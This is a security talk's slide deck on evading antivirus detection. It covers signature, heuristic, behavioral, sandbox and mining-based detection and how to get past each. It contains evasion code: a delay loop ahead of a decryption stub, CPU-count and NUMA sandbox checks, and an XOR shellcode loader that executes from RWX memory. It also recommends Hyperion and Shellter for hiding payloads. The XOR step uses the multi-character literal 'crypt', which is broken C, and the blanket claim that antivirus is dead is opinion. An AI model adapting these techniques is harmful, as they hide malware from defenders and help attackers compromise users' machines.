Crafting The Unavoidable
by Mohamed Bedewi
Senior Security Researcher and Penetration Tester
CCNA | MCSE | RHCE | CEH | ECSA | OSCP | CISM | GCIH | LPT | OSCE
Introduction and Facts
• Creeper was the first known computer virus and it targeted TENEX OS back in 1971.
• Ray Tomlinson created what people believed the first antivirus to delete Creeper.
• Executables can be infected without getting their size nor functionality altered.
• NextGen antiviruses miss the obvious with high rate of false-positive detections.
• Malwares adapt an average of ten evasion techniques apart from sophistication.
• Antiviruses nowadays became dead and useless regardless the vendor or technology.
Virus Detection Techniques
One of the few solid theoretical results in the study of computer viruses is Frederick Cohen's 1987 demonstration that there is no algorithm
that can perfectly detect all possible viruses. However, using different layers of defense, a good detection rate may be achieved.
Signature-Based
Heuristic-Based
Behavioral-Based
Sandbox-Based
Mining-Based
works by searching for
particular sequences of
bytes within an object in
order to identify a specific
version of a threat, it's the
simplest form of scanning,
constructed upon databases
which have virus signatures.
aims to generically detecting
new threats by statically
examining objects for
suspicious characteristics
without an exact signature
match, it was developed to
overcome the limitations of
signature-based detection.
observes the execution
behavior of an object based
on normal and abnormal
measures to determine
whether or not the behavior
of a running process marks it
as a threat and if so the
process will be terminated.
observes the execution
behavior of an object based
on normal and abnormal
measures but in an isolated
environment to determine
whether the behavior of a
running process marks it as a
threat to the real system.
detects patterns in large
amounts of data such as
byte code and use these
patterns to detect future
instances in similar data, it
employs learning algorithms
to classify whether or not an
object is malicious.
Static Analyses
Dynamic Analyses
What you just pull code from Rapid9 or some shit?
since when did you become a script kiddie?
Elliot on Mr. Robot
Bypassing Signature-Based Detection
• Find the signature that the antivirus is looking for inside the executable in question.
• Modify the found signature without affecting the execution flow of the executable.
Escape
Split the Binary
Dsplit or Evade
Each is > than prev
Hex Editor or
Disassembler
Modify
Compress
Encode
Bypassing Heuristic-Based Detection
• Code cave is used to create a self-modifying
code and is being allocated via VirtualAllocEx.
Entry Point
Entry Point
evil.exe
evil.exe
Signature
Signature
• Ensure that all malicious code is hidden via
encryption for example with a simple stub.
• Encrypting the whole .text section will be
considered malicious for some antiviruses.
“Encryption if done right can easily bypass the
static analyses techniques employed by AVs”
Stub
Bypassing Behavioral-Based Detection
• Make sure to discourage the antivirus from running the stub to keep the evil hidden.
• Antiviruses have limitations which once identified can be abused to achieve a bypass.
• How about a for loop to increment one billion of times a counter?
• This operation is a resource intensive for AVs but not for the PC
• Antiviruses will typically ignore the stub and a bypass is achieved
• This is a clean method which won’t leave any system evidence
“If the antivirus can’t decode a malicious code which is already
bypassing static analysis then it’s defeating dynamic analysis”
#define MAX_COUNT 1000000000
int main() {
int cpt = 0;
int i = 0;
for(i =0; i < MAX_COUNT; i ++) {
cpt++;
}
if(cpt == MAX_COUNT) {
decryptionStub();
encryptedShell();
}
return 0;
}
Bypassing Sandbox-Based Detection
• Detecting virtual systems isn’t that hard and from there code can act boring or long.
• Sandboxes have hardware and processing time limitations which again can get abused.
“If you think that detecting a
Sandbox is hard! Think again”
import multiprocessing
if multiprocessing.cpu_count() <2:
exit()
else:
doEvil()
• Non Uniform Memory Access (NUMA) is used to increase the
processor speed without increasing the load on the bus.
• NUMA is linked to a whole set of functions declare in
Kernel32.dll which is huge for the emulation system to cover.
int main( void ){
LPVOID mem = NULL;
mem =
VirtualAllocExNuma(GetCurrentP
rocess(), NULL, 1000,
MEM_RESERVE | MEM_COMMIT,
PAGE_EXECUTE_READWRITE,0);
if (mem != NULL){
decryptionStub();
encryptedShell();
}
return 0;
}
For Bypassing Mining-Based Detection I only have
one word to say for the time being “File-less”
Creative Bypass Tools Observed in the Wild
AES Encrypted Payload via Hyperion
• Hyperion encrypts the supplied executable with 5 rounds of AES encryption by default.
• The AES encryption key is then discarded after encryption to defeat dynamic analyses.
• Once executed the executable will brute-force its own AES keys to execute the payload.
The logic behind Hyperion is awesome in my opinion
but unfortunately this technique is not perfect since:
• There’s a noticeable delay in payload execution.
• Some antiviruses pick this routine as a packer.
Found Section: .text
VSize: 0x924, VAddress: 0x1000, RawSize: 0xa00, RawAddress: 0x400
Found Section: .data
VSize: 0x5f0, VAddress: 0x2000, RawSize: 0x600, RawAddress: 0xe00
Found Section: .rdata
VSize: 0xc0, VAddress: 0x3000, RawSize: 0x200, RawAddress: 0x1400
Found Section: .bss
VSize: 0xe0, VAddress: 0x4000, RawSize: 0x0, RawAddress: 0x0
Found Section: .idata
VSize: 0x268, VAddress: 0x5000, RawSize: 0x400, RawAddress: 0x1600
“Regardless the limitations of Hyperion, it’s very effective
and not detected by the majority of antivirus solutions”
Input file size + Checksum: 0x4140
Rounded up to a multiple of key size: 0x4150
Generated Checksum: 0xcf0cc
Generated Encryption Key: 0x0 0x2 0x1 0x2 0x3 0x3 0x0 0x0 0x0 0x0
0x0 0x0 0x0 0x0 0x0 0x0
Polymorphic Executable via Shellter
• Shellter is capable of generating a unique polymorphic executable in every time.
• It will apply a random amount of XOR, ADD, SUB, NOT operations to supplied executable.
• Every time it will generate the payload decoder based on the chosen random operations.
• The decoding key can be dynamic and based on the values of specific CPU registers.
• Some basic sandboxing detection techniques were implemented to bypass sandboxing.
Supported Encoding Operators:
“Shellter looks very promising as it picks up from where
Hyperion stopped, it’s fairly documented and effective”
XOR --> x
ADD --> +
SUB --> NOT --> !
How to Craft the Unavoidable?
Crafting the Most Evasive Executables
• Reconnaissance is required to understand the target’s antivirus features and vendor.
• Depend on your own unique code as I would hate Elliot calling you a script kiddie.
• If you’re not writing your own code encrypt the payload with an expensive stub.
This code creates a character array with
an XORed shellcode, performs an XOR
operation with the key of ‘crypt‘, allocates
memory, copies the character array in
defined allocated memory and executes it
#include <windows.h>
#include <iostream>
int main(int argc, char **argv) {
char b[] = {/* XORed shellcode with the key of ‘crypt' shellcode
i.e. 0x4C,0x4F, 0x4C */};
char c[sizeof b];
for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ ‘crypt';}
void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
memcpy(exec, c, sizeof c);
((void(*)())exec)();
}
Multiple Scan Results of a Metasploit Payload
The screenshot on the right is the scan
result of a metasploit reverse TCP payload!
Antivirus as a technology is dead regardless
the vendor but we shouldn’t stop using them!
Security researchers usually do PoCs and not
statistics nor graphs since we’re technical!
Note: this slide was added after the personal
argue in the presentation which wasn’t helpful
Thanks and Have a Great Day